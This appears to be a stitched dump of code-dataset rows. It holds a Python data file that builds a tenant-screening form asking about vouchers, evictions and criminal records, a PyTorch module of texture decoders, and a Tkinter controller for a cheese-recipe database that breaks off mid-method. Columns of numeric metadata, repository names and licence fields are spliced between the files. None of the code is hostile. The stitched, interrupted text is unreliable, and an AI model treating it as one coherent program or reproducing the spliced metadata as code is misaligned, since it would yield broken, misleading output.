db('Formularios').insertar('Rental Prospects', [[{'opcion': 0, 'Logo': 'img-admin', 'opciones': 'archivos', 'name': 'logo', 'value': 0}, {'Rental Prospects': 'text-admin', 'name': 'titulo', 'value': 'Rental Prospects'}, {'1- Name and Last Name': 'text', 'name': 'last_name', 'value': ''}, {'2- Phone Number': 'text-phone', 'name': 'phone', 'value': ''}, {'3- Email Adress': 'text-email', 'name': 'email', 'value': ''}, {'opcion': 1, 'opciones': 'formularios', '4- Size of Apartment': 'select', 'value': 0, 'name': 'size_apartment'}, {'opcion': 0, '5- Does the person have a Section 8 Voucher or any other payment assistance?': 'select', 'opciones': 'main', 'name': 'voucher_payment', 'value': 0}, {'5.1-If so, of how much?': 'number', 'name': 'si_voucher_payment', 'value': '0'}, {'descripcion': '# of Adults & # of Children (+ ages)', '7.-How many people will be living in the apartment?': 'text', 'name': 'live_pest', 'value': ''}, {'8.-Will you have pets living in the apartment?': 'number', 'name': 'pest_in_apartment', 'value': '0'}, {'opcion': 0, 'opciones': 'main', 'name': 'any_evictions', 'value': 0, '9.-Have the person had any evictions?': 'select'}, {'opcion': 0, 'opciones': 'main', '10.- Do you have a criminal record?': 'select', 'value': 0, 'name': 'criminal_record'}, {'If so, when?': 'text', 'name': 'when', 'value': ''}, {'opcion': 0, 'opciones': 'main', 'name': 'what_type', 'value': 0, '11.- If so, what type?': 'select'}, {'Note': 'textarea', 'name': 'note', 'value': ''}]], {'Formulario': 0}, '19/7/2017 16:24:50', [])
db('Opciones').insertar('Antecedentes criminales', ['', 'Misdemeanor', 'Felony'])
db('Opciones').insertar('Tama\xc3\xb1o de los apartamentos', ['', 'Studio', '1 Bedroom 1 Bath', '2 Bedroom 1 Bath (1.5 Bath)', '2 Bedroom 2 Bath', '3 Bedroom 2 Bath'])
db('Post-de-Formulario').insertar('Rental Prospects 1', [{'value': '0', 'name': 'id', 'Formulario': 'hidden-id'}, [{'opcion': 0, 'Logo': 'img-admin', 'opciones': 'archivos', 'name': 'logo', 'value': 0}, {'Rental Prospects': 'text-admin', 'name': 'titulo', 'value': 'Rental Prospects'}, {'1- Name and Last Name': 'text', 'name': 'last_name', 'value': ''}, {'2- Phone Number': 'text-phone', 'name': 'phone', 'value': ''}, {'3- Email Adress': 'text-email', 'name': 'email', 'value': ''}, {'opcion': 1, 'opciones': 'formularios', '4- Size of Apartment': 'select', 'value': 0, 'name': 'size_apartment'}, {'opcion': 0, '5- Does the person have a Section 8 Voucher or any other payment assistance?': 'select', 'opciones': 'main', 'name': 'voucher_payment', 'value': 0}, {'5.1-If so, of how much?': 'number', 'name': 'si_voucher_payment', 'value': 0}, {'descripcion': '# of Adults & # of Children (+ ages)', '7.-How many people will be living in the apartment?': 'text', 'name': 'live_pest', 'value': ''}, {'8.-Will you have pets living in the apartment?': 'number', 'name': 'pest_in_apartment', 'value': 0}, {'opcion': 0, 'opciones': 'main', 'name': 'any_evictions', 'value': 1, '9.-Have the person had any evictions?': 'select'}, {'opcion': 0, 'opciones': 'main', '10.- Do you have a criminal record?': 'select', 'value': 0, 'name': 'criminal_record'}, {'If so, when?': 'text', 'name': 'when', 'value': ''}, {'opcion': 0, 'opciones': 'main', 'name': 'what_type', 'value': 0, '11.- If so, what type?': 'select'}, {'Note': 'textarea', 'name': 'note', 'value': 'ok'}]], {'Post-de-Formulario': 0}, '29/8/2017 23:32:19', [])
# NOTE(review): load is set True here and immediately False below; the
# True looks redundant (it was already set True above) — confirm against
# the zdb DB.load semantics before removing.
db.load=True
db.load=False
| 175.038462
| 1,613
| 0.633267
| 680
| 4,551
| 4.205882
| 0.192647
| 0.033566
| 0.058741
| 0.07972
| 0.846504
| 0.840909
| 0.840909
| 0.840909
| 0.840909
| 0.840909
| 0
| 0.030532
| 0.100417
| 4,551
| 25
| 1,614
| 182.04
| 0.668051
| 0.004614
| 0
| 0.083333
| 0
| 0
| 0.55742
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4a2c4409de8c324e16075fba002fbc4c6742acfc
| 131
|
py
|
Python
|
data_preprocessing/__init__.py
|
KylinLiu-633/GS-GLSTM-master
|
585eb099bb49a5f737b001db9a5031dc1a409fd8
|
[
"MIT"
] | null | null | null |
data_preprocessing/__init__.py
|
KylinLiu-633/GS-GLSTM-master
|
585eb099bb49a5f737b001db9a5031dc1a409fd8
|
[
"MIT"
] | 1
|
2021-08-31T09:20:10.000Z
|
2021-09-08T04:37:17.000Z
|
data_preprocessing/__init__.py
|
KylinLiu-633/GS-GLSTM-master
|
585eb099bb49a5f737b001db9a5031dc1a409fd8
|
[
"MIT"
] | null | null | null |
from .get_dataset import word_mapping, edge_mapping, char_mapping
from .get_dataset import get_dataset_from_instances, collect_data
| 65.5
| 65
| 0.885496
| 20
| 131
| 5.35
| 0.55
| 0.280374
| 0.261682
| 0.373832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076336
| 131
| 2
| 66
| 65.5
| 0.884298
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4a958671aa088352e289ec4b83ba7245eca8388c
| 6,125
|
py
|
Python
|
mesh2tex/texnet/models/decoder.py
|
nihalsid/texture_fields
|
dcd091a5f40fe433dbc47f2055d1cd2d3d2a1b87
|
[
"MIT"
] | 78
|
2019-10-30T13:05:16.000Z
|
2022-03-02T06:15:20.000Z
|
mesh2tex/texnet/models/decoder.py
|
nihalsid/texture_fields
|
dcd091a5f40fe433dbc47f2055d1cd2d3d2a1b87
|
[
"MIT"
] | 6
|
2020-06-21T08:39:02.000Z
|
2021-11-28T14:47:12.000Z
|
mesh2tex/texnet/models/decoder.py
|
nihalsid/texture_fields
|
dcd091a5f40fe433dbc47f2055d1cd2d3d2a1b87
|
[
"MIT"
] | 12
|
2020-04-02T21:08:15.000Z
|
2021-12-12T14:23:38.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from mesh2tex import common
from mesh2tex.layers import (
ResnetBlockPointwise,
EqualizedLR
)
class DecoderEachLayerC(nn.Module):
    """Pointwise decoder that injects the conditioning code at every layer.

    The concatenated (geometry code, latent code) vector is projected by a
    per-stage linear layer and added to the features before each of the
    5 pointwise resnet blocks; a final 1x1 conv maps to RGB in [0, 1].

    Args:
        c_dim: dimension of the global geometry descriptor.
        z_dim: dimension of the latent code z.
        dim: dimension of the input points (default 3).
        hidden_size: feature width of the hidden layers.
        leaky: use leaky ReLU (slope 0.2) for the output activation.
        resnet_leaky: use leaky ReLU inside the resnet blocks.
        eq_lr: wrap learnable layers with equalized learning rate.
    """

    # Number of (fc_cz_i, block_i) stages.
    _NUM_STAGES = 5

    def __init__(self, c_dim=128, z_dim=128, dim=3,
                 hidden_size=128, leaky=True,
                 resnet_leaky=True, eq_lr=False):
        super().__init__()
        self.c_dim = c_dim
        self.eq_lr = eq_lr

        # Activations: plain ReLU, or leaky ReLU with slope 0.2.
        if not leaky:
            self.actvn = F.relu
        else:
            self.actvn = lambda x: F.leaky_relu(x, 0.2)
        if not resnet_leaky:
            self.resnet_actvn = F.relu
        else:
            self.resnet_actvn = lambda x: F.leaky_relu(x, 0.2)

        # Submodules. The block{i} / fc_cz_{i} attribute names are kept
        # identical to the original hand-written version so existing
        # checkpoints (state_dict keys) remain loadable.
        self.conv_p = nn.Conv1d(dim, hidden_size, 1)
        for i in range(self._NUM_STAGES):
            setattr(self, 'block%d' % i, ResnetBlockPointwise(
                hidden_size, actvn=self.resnet_actvn, eq_lr=eq_lr))
            setattr(self, 'fc_cz_%d' % i,
                    nn.Linear(c_dim + z_dim, hidden_size))
        self.conv_out = nn.Conv1d(hidden_size, 3, 1)

        if self.eq_lr:
            # Wrap every directly-owned learnable layer for equalized LR
            # (the resnet blocks handle eq_lr themselves).
            self.conv_p = EqualizedLR(self.conv_p)
            self.conv_out = EqualizedLR(self.conv_out)
            for i in range(self._NUM_STAGES):
                name = 'fc_cz_%d' % i
                setattr(self, name, EqualizedLR(getattr(self, name)))

        # Initialization: start from a zero output layer.
        nn.init.zeros_(self.conv_out.weight)

    def forward(self, p, geom_descr, z, **kwargs):
        """Decode colors for points ``p`` conditioned on geometry and z.

        Args:
            p: point tensor fed to a Conv1d, i.e. (batch, dim, T).
            geom_descr: dict holding the global geometry code under 'global'.
            z: latent code, concatenated with the geometry code.

        Returns:
            Sigmoid-activated color tensor of shape (batch, 3, T).
        """
        c = geom_descr['global']
        cz = torch.cat([c, z], dim=1)

        net = self.conv_p(p)
        # Each stage: add the projected code, then apply the resnet block.
        for i in range(self._NUM_STAGES):
            net = net + getattr(self, 'fc_cz_%d' % i)(cz).unsqueeze(2)
            net = getattr(self, 'block%d' % i)(net)

        out = self.conv_out(self.actvn(net))
        out = torch.sigmoid(out)
        return out
class DecoderEachLayerCLarger(nn.Module):
    """Deeper variant of DecoderEachLayerC with 7 conditioned resnet stages.

    Identical structure: the concatenated (geometry code, latent code) is
    projected per stage and added to the features before each pointwise
    resnet block; a final 1x1 conv maps to RGB in [0, 1].

    Args:
        c_dim: dimension of the global geometry descriptor.
        z_dim: dimension of the latent code z.
        dim: dimension of the input points (default 3).
        hidden_size: feature width of the hidden layers.
        leaky: use leaky ReLU (slope 0.2) for the output activation.
        resnet_leaky: use leaky ReLU inside the resnet blocks.
        eq_lr: wrap learnable layers with equalized learning rate.
    """

    # Number of (fc_cz_i, block_i) stages.
    _NUM_STAGES = 7

    def __init__(self, c_dim=128, z_dim=128, dim=3,
                 hidden_size=128, leaky=True,
                 resnet_leaky=True, eq_lr=False):
        super().__init__()
        self.c_dim = c_dim
        self.eq_lr = eq_lr

        # Activations: plain ReLU, or leaky ReLU with slope 0.2.
        if not leaky:
            self.actvn = F.relu
        else:
            self.actvn = lambda x: F.leaky_relu(x, 0.2)
        if not resnet_leaky:
            self.resnet_actvn = F.relu
        else:
            self.resnet_actvn = lambda x: F.leaky_relu(x, 0.2)

        # Submodules. The block{i} / fc_cz_{i} attribute names are kept
        # identical to the original hand-written version so existing
        # checkpoints (state_dict keys) remain loadable.
        self.conv_p = nn.Conv1d(dim, hidden_size, 1)
        for i in range(self._NUM_STAGES):
            setattr(self, 'block%d' % i, ResnetBlockPointwise(
                hidden_size, actvn=self.resnet_actvn, eq_lr=eq_lr))
            setattr(self, 'fc_cz_%d' % i,
                    nn.Linear(c_dim + z_dim, hidden_size))
        self.conv_out = nn.Conv1d(hidden_size, 3, 1)

        if self.eq_lr:
            # Wrap every directly-owned learnable layer for equalized LR
            # (the resnet blocks handle eq_lr themselves).
            self.conv_p = EqualizedLR(self.conv_p)
            self.conv_out = EqualizedLR(self.conv_out)
            for i in range(self._NUM_STAGES):
                name = 'fc_cz_%d' % i
                setattr(self, name, EqualizedLR(getattr(self, name)))

        # Initialization: start from a zero output layer.
        nn.init.zeros_(self.conv_out.weight)

    def forward(self, p, geom_descr, z, **kwargs):
        """Decode colors for points ``p`` conditioned on geometry and z.

        Args:
            p: point tensor fed to a Conv1d, i.e. (batch, dim, T).
            geom_descr: dict holding the global geometry code under 'global'.
            z: latent code, concatenated with the geometry code.

        Returns:
            Sigmoid-activated color tensor of shape (batch, 3, T).
        """
        c = geom_descr['global']
        cz = torch.cat([c, z], dim=1)

        net = self.conv_p(p)
        # Each stage: add the projected code, then apply the resnet block.
        for i in range(self._NUM_STAGES):
            net = net + getattr(self, 'fc_cz_%d' % i)(cz).unsqueeze(2)
            net = getattr(self, 'block%d' % i)(net)

        out = self.conv_out(self.actvn(net))
        out = torch.sigmoid(out)
        return out
| 35.818713
| 62
| 0.603592
| 917
| 6,125
| 3.752454
| 0.083969
| 0.083697
| 0.111595
| 0.032549
| 0.916013
| 0.904969
| 0.89596
| 0.89596
| 0.89596
| 0.89596
| 0
| 0.028846
| 0.286857
| 6,125
| 170
| 63
| 36.029412
| 0.758929
| 0.008327
| 0
| 0.855072
| 0
| 0
| 0.001977
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028986
| false
| 0
| 0.036232
| 0
| 0.094203
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
435ba19e0432ffe8dd85a3cc0e614d50fb921a7c
| 28,801
|
py
|
Python
|
controller.py
|
Jazpy/MYP-P2
|
86f38b52a6e3616cb8d9d81d97441dc1a6264f8c
|
[
"MIT"
] | null | null | null |
controller.py
|
Jazpy/MYP-P2
|
86f38b52a6e3616cb8d9d81d97441dc1a6264f8c
|
[
"MIT"
] | null | null | null |
controller.py
|
Jazpy/MYP-P2
|
86f38b52a6e3616cb8d9d81d97441dc1a6264f8c
|
[
"MIT"
] | null | null | null |
import Tkinter as tk
import ttk
import textwrap
import db_func
import table_objects
"""
This module manages the connection between database and GUI,
it is the controller of the MVC programming pattern
"""
class controller(tk.Frame):
    def __init__(self, parent, db):
        """
        Construct a new 'controller' frame and show the main menu.

        :param parent: the view's parent widget (the Tk root)
        :param db: database connection to operate on
        :return: returns nothing
        """
        tk.Frame.__init__(self, parent, background = "white")
        self.parent = parent
        self.db = db
        self.init_ui()
        # Text/listbox widget references shared between screens; each
        # screen creates the ones it needs and clean() resets them.
        self.area1 = None
        self.area2 = None
        self.area3 = None
        self.area4 = None
        self.listbox = None
        # Draw the initial screen (event argument is unused).
        self.main_menu("")
def init_ui(self):
"""
Create app window
:return: returns nothing
"""
self.parent.title("RECIPINATOR")
self.pack(fill = tk.BOTH, expand = 1)
def clean(self):
"""
Clean app window
:return: returns nothing
"""
for widget in self.winfo_children():
widget.destroy()
self.area1 = None
self.area2 = None
self.area3 = None
self.area4 = None
self.listbox = None
    def main_menu(self, event):
        """
        Creates the app's main menu: Add / Delete / Search buttons.

        :param event: Tk event that triggered the redraw (unused)
        :return: returns nothing
        """
        self.clean()
        # Shared button style used by every menu screen.
        ttk.Style().configure("Slate.TButton", padding =
            (0, 5, 0, 5), font = 'Arial 20',
            # foreground = "#CCCECF", background = "#092E3B")
            foreground = "black", background = "white")
        # Three equally-weighted rows, one button each.
        self.columnconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(1, pad = 3, weight = 1)
        self.rowconfigure(2, pad = 3, weight = 1)
        add = ttk.Button(self, text = "Add", style = "Slate.TButton")
        add.grid(row = 0, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        delete = ttk.Button(self, text = "Delete", style = "Slate.TButton")
        delete.grid(row = 1, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        search = ttk.Button(self, text = "Search", style = "Slate.TButton")
        search.grid(row = 2, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        # "<1>" = left mouse click.
        add.bind("<1>", self.add_menu)
        delete.bind("<1>", self.delete_menu)
        search.bind("<1>", self.search_menu)
        self.pack()
    def add_menu(self, event):
        """
        Shows the user adding options: add cheese, add recipe, or go back.

        :param event: Tk event that triggered the redraw (unused)
        :return: returns nothing
        """
        self.clean()
        ttk.Style().configure("Slate.TButton", padding =
            (0, 5, 0, 5), font = 'Arial 20',
            # foreground = "#CCCECF", background = "#092E3B")
            foreground = "black", background = "white")
        # Three equally-weighted rows, one button each.
        self.columnconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(1, pad = 3, weight = 1)
        self.rowconfigure(2, pad = 3, weight = 1)
        cheese = ttk.Button(self, text = "Add cheese",
            style = "Slate.TButton")
        cheese.grid(row = 0, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        recipe = ttk.Button(self, text = "Add recipe",
            style = "Slate.TButton")
        recipe.grid(row = 1, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        back = ttk.Button(self, text = "Back",
            style = "Slate.TButton")
        back.grid(row = 2, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        cheese.bind("<1>", self.add_cheese)
        recipe.bind("<1>", self.add_recipe)
        back.bind("<1>", self.main_menu)
        self.pack()
    def add_cheese(self, event):
        """
        Asks the user for a new cheese's information: name, country of
        origin and softness, each in its own text area.

        :param event: Tk event that triggered the redraw (unused)
        :return: returns nothing
        """
        self.clean()
        ttk.Style().configure("Slate.TButton", padding =
            (0, 5, 0, 5), font = 'Arial 20',
            # foreground = "#CCCECF", background = "#092E3B")
            foreground = "black", background = "white")
        # Alternating label (weight 0) / text-area (weight 1) rows,
        # then the Add/Back buttons at the bottom.
        self.columnconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(0, pad = 3, weight = 0)
        self.rowconfigure(1, pad = 3, weight = 1)
        self.rowconfigure(2, pad = 3, weight = 0)
        self.rowconfigure(3, pad = 3, weight = 1)
        self.rowconfigure(4, pad = 3, weight = 0)
        self.rowconfigure(5, pad = 3, weight = 1)
        self.rowconfigure(6, pad = 3, weight = 0)
        self.rowconfigure(7, pad = 3, weight = 0)
        clabel = tk.Label(self, text = "Name:", font = ("Arial", 16),
            bg = "white")
        clabel.grid(row = 0, column = 0)
        # area1 = cheese name (read back by db_add_cheese).
        self.area1 = tk.Text(self)
        self.area1.grid(row = 1, column = 0, columnspan = 1,
            rowspan = 1)
        colabel = tk.Label(self, text = "Country of origin:",
            font = ("Arial", 16), bg = "white")
        colabel.grid(row = 2, column = 0)
        # area2 = country of origin.
        self.area2 = tk.Text(self)
        self.area2.grid(row = 3, column = 0, columnspan = 1,
            rowspan = 1)
        solabel = tk.Label(self, text = "Softness of cheese:",
            font = ("Arial", 16), bg = "white")
        solabel.grid(row = 4, column = 0)
        # area3 = softness.
        self.area3 = tk.Text(self)
        self.area3.grid(row = 5, column = 0, columnspan = 1,
            rowspan = 1)
        add = ttk.Button(self, text = "Add", style = "Slate.TButton")
        add.grid(row = 6, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        back = ttk.Button(self, text = "Back", style = "Slate.TButton")
        back.grid(row = 7, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        back.bind("<1>", self.add_menu)
        add.bind("<1>", self.db_add_cheese)
        self.pack()
    def db_add_cheese(self, event):
        """
        Handles adding the cheese (and optionally its country) entered on
        the add_cheese screen to the database, then shows a success screen.

        :param event: Tk event that triggered the action (unused)
        :return: returns nothing
        """
        # "1.0" to 'end-1c' = whole Text content minus the trailing newline.
        # Lowercased and ASCII-stripped (Python 2 str.encode on text).
        cheese_name = self.area1.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
        country_name = self.area2.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
        softness = self.area3.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
        cheese_to_add = None
        country_to_add = None
        # -1 id: let the db layer assign the real row id.
        if cheese_name != "":
            cheese_to_add = table_objects.cheese(-1,
                cheese_name, softness)
            db_func.add_cheese_row(self.db, cheese_to_add)
        if country_name != "":
            country_to_add = table_objects.country(-1,
                country_name)
            db_func.add_country_row(self.db, country_to_add)
        # Only link the pair when both were actually provided.
        if cheese_to_add is not None and country_to_add is not None:
            db_func.connect_cheese_country(self.db,
                cheese_to_add, country_to_add)
        # Replace the form with a success screen.
        self.clean()
        self.columnconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(1, pad = 3, weight = 1)
        label = tk.Label(self, text = "Success!",
            font = ("Arial", 20), bg = "white")
        label.grid(row = 0, column = 0)
        back = ttk.Button(self, text = "Back", style = "Slate.TButton")
        back.grid(row = 1, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        back.bind("<1>", self.main_menu)
        self.pack()
    def add_recipe(self, event):
        """
        Asks the user for recipe information: cheese used, recipe name,
        cooking time and instructions, each in its own text area.

        :param event: Tk event that triggered the redraw (unused)
        :return: returns nothing
        """
        self.clean()
        ttk.Style().configure("Slate.TButton", padding =
            (0, 5, 0, 5), font = 'Arial 20',
            # foreground = "#CCCECF", background = "#092E3B")
            foreground = "black", background = "white")
        # Alternating label (weight 0) / text-area (weight 1) rows,
        # then the Add/Back buttons at the bottom.
        self.columnconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(0, pad = 3, weight = 0)
        self.rowconfigure(1, pad = 3, weight = 1)
        self.rowconfigure(2, pad = 3, weight = 0)
        self.rowconfigure(3, pad = 3, weight = 1)
        self.rowconfigure(4, pad = 3, weight = 0)
        self.rowconfigure(5, pad = 3, weight = 1)
        self.rowconfigure(6, pad = 3, weight = 0)
        self.rowconfigure(7, pad = 3, weight = 1)
        self.rowconfigure(8, pad = 3, weight = 0)
        self.rowconfigure(9, pad = 3, weight = 0)
        clabel = tk.Label(self, text = "Cheese used:",
            font = ("Arial", 16), bg = "white")
        clabel.grid(row = 0, column = 0)
        # area1 = cheese name (read back by db_add_recipe).
        self.area1 = tk.Text(self)
        self.area1.grid(row = 1, column = 0, columnspan = 1,
            rowspan = 1)
        relabel = tk.Label(self, text = "Recipe name:",
            font = ("Arial", 16), bg = "white")
        relabel.grid(row = 2, column = 0)
        # area2 = recipe name.
        self.area2 = tk.Text(self)
        self.area2.grid(row = 3, column = 0, columnspan = 1,
            rowspan = 1)
        tilabel = tk.Label(self, text = "Cooking time:",
            font = ("Arial", 16), bg = "white")
        tilabel.grid(row = 4, column = 0)
        # area3 = cooking time.
        self.area3 = tk.Text(self)
        self.area3.grid(row = 5, column = 0, columnspan = 1,
            rowspan = 1)
        inlabel = tk.Label(self, text = "Instructions:",
            font = ("Arial", 16), bg = "white")
        inlabel.grid(row = 6, column = 0)
        # area4 = instructions.
        self.area4 = tk.Text(self)
        self.area4.grid(row = 7, column = 0, columnspan = 1,
            rowspan = 1)
        add = ttk.Button(self, text = "Add", style = "Slate.TButton")
        add.grid(row = 8, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        back = ttk.Button(self, text = "Back", style = "Slate.TButton")
        back.grid(row = 9, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        back.bind("<1>", self.add_menu)
        add.bind("<1>", self.db_add_recipe)
        self.pack()
    def db_add_recipe(self, event):
        """
        Handles adding the recipe entered on the add_recipe screen to the
        database. Validates the names first; shows an error screen when a
        name is blank, the cheese is unknown, or the recipe already exists.

        :param event: Tk event that triggered the action (unused)
        :return: returns nothing
        """
        # "1.0" to 'end-1c' = whole Text content minus the trailing newline.
        cheese_name = self.area1.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
        recipe_name = self.area2.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
        time = self.area3.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
        instructions = self.area4.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
        self.columnconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(1, pad = 3, weight = 1)
        if (cheese_name == "" or recipe_name == ""):
            # Validation failure: blank name.
            self.clean()
            label = tk.Label(self, text =
                "Error: A name field was left blank",
                font = ("Arial", 20), bg = "white")
            label.grid(row = 0, column = 0)
            back = ttk.Button(self, text = "Back",
                style = "Slate.TButton")
            back.grid(row = 1, column = 0,
                sticky = tk.N + tk.S + tk.E + tk.W)
            back.bind("<1>", self.main_menu)
        elif (db_func.row_exists(self.db, cheese_name, "cheeses") is False or
              db_func.row_exists(self.db, recipe_name, "recipes") is True):
            # Validation failure: cheese missing or recipe duplicated.
            self.clean()
            label = tk.Label(self, text =
                "Error: Cheese doesn't exist in database, "\
                "or recipe already exists",
                font = ("Arial", 16), bg = "white")
            label.grid(row = 0, column = 0)
            back = ttk.Button(self, text = "Back",
                style = "Slate.TButton")
            back.grid(row = 1, column = 0,
                sticky = tk.N + tk.S + tk.E + tk.W)
            back.bind("<1>", self.main_menu)
        else:
            # -1 id: let the db layer assign the real row id. The cheese
            # already exists, so its softness value here is irrelevant.
            cheese_to_add = table_objects.cheese(-1,
                cheese_name, "notimportant")
            db_func.add_cheese_row(self.db, cheese_to_add)
            recipe_to_add = table_objects.recipe(-1,
                recipe_name, instructions, time)
            db_func.add_recipe_row(self.db,
                recipe_to_add)
            db_func.connect_cheese_recipe(self.db,
                cheese_to_add, recipe_to_add)
            # Replace the form with a success screen.
            self.clean()
            label = tk.Label(self, text = "Success!",
                font = ("Arial", 20), bg = "white")
            label.grid(row = 0, column = 0)
            back = ttk.Button(self, text = "Back",
                style = "Slate.TButton")
            back.grid(row = 1, column = 0,
                sticky = tk.N + tk.S + tk.E + tk.W)
            back.bind("<1>", self.main_menu)
        self.pack()
    def delete_menu(self, event):
        """
        Shows the user deletion options: delete cheese, delete recipe,
        or go back.

        :param event: Tk event that triggered the redraw (unused)
        :return: returns nothing
        """
        self.clean()
        ttk.Style().configure("Slate.TButton", padding =
            (0, 5, 0, 5), font = 'Arial 20',
            # foreground = "#CCCECF", background = "#092E3B")
            foreground = "black", background = "white")
        # Three equally-weighted rows, one button each.
        self.columnconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(1, pad = 3, weight = 1)
        self.rowconfigure(2, pad = 3, weight = 1)
        cheese = ttk.Button(self, text = "Delete cheese",
            style = "Slate.TButton")
        cheese.grid(row = 0, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        recipe = ttk.Button(self, text = "Delete recipe",
            style = "Slate.TButton")
        recipe.grid(row = 1, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        back = ttk.Button(self, text = "Back",
            style = "Slate.TButton")
        back.grid(row = 2, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        cheese.bind("<1>", self.del_cheese)
        recipe.bind("<1>", self.del_recipe)
        back.bind("<1>", self.main_menu)
        self.pack()
    def del_cheese(self, event):
        """
        Asks for the name of the cheese to delete.

        :param event: Tk event that triggered the redraw (unused)
        :return: returns nothing
        """
        self.clean()
        ttk.Style().configure("Slate.TButton", padding =
            (0, 5, 0, 5), font = 'Arial 20',
            # foreground = "#CCCECF", background = "#092E3B")
            foreground = "black", background = "white")
        self.columnconfigure(0, pad = 3, weight = 1)
        self.rowconfigure(0, pad = 3, weight = 0)
        self.rowconfigure(1, pad = 3, weight = 1)
        clabel = tk.Label(self, text = "Name:", font = ("Arial", 16),
            bg = "white")
        clabel.grid(row = 0, column = 0)
        # area1 = cheese name (read back by db_del_cheese).
        self.area1 = tk.Text(self)
        self.area1.grid(row = 1, column = 0, columnspan = 1,
            rowspan = 1)
        # NOTE(review): buttons land in rows 6/7 while only rows 0/1 are
        # configured — presumably copied from add_cheese; Tk tolerates it
        # but the rows get no weight/padding. Confirm intended layout.
        delb = ttk.Button(self, text = "Delete",
            style = "Slate.TButton")
        delb.grid(row = 6, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        back = ttk.Button(self, text = "Back", style = "Slate.TButton")
        back.grid(row = 7, column = 0,
            sticky = tk.N + tk.S + tk.E + tk.W)
        back.bind("<1>", self.delete_menu)
        delb.bind("<1>", self.db_del_cheese)
        self.pack()
def db_del_cheese(self, event):
"""
Handles deleting country from the database
:return: returns nothing
"""
cheese_name = self.area1.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
cheese_to_add = None
if (cheese_name == "" or
db_func.row_exists(self.db, cheese_name, "cheeses") is False):
self.clean()
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
label = tk.Label(self, text =
"Error: Cheese not found",
font = ("Arial", 20), bg = "white")
label.grid(row = 0, column = 0)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.main_menu)
else:
cursor = self.db.cursor()
cursor.execute("select rowid from cheeses where name = ?",
(str(cheese_name),))
chid = cursor.fetchone()[0]
cursor.execute("select softness from cheeses where name = ?",
(str(cheese_name),))
softness = cursor.fetchone()[0]
cheese_to_del = table_objects.cheese(chid,
cheese_name, softness)
db_func.del_cheese_row(self.db, cheese_to_del)
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
label = tk.Label(self, text = "Success!",
font = ("Arial", 20), bg = "white")
label.grid(row = 0, column = 0)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.main_menu)
self.pack()
    def del_recipe(self, event):
        """
        Asks for the name of the recipe to delete.

        :param event: Tk event that triggered the redraw (unused)
        :return: returns nothing
        """
        self.clean()
        ttk.Style().configure("Slate.TButton", padding =
            (0, 5, 0, 5), font = 'Arial 20',
            # foreground = "#CCCECF", background = "#092E3B")
            foreground = "black", background = "white")
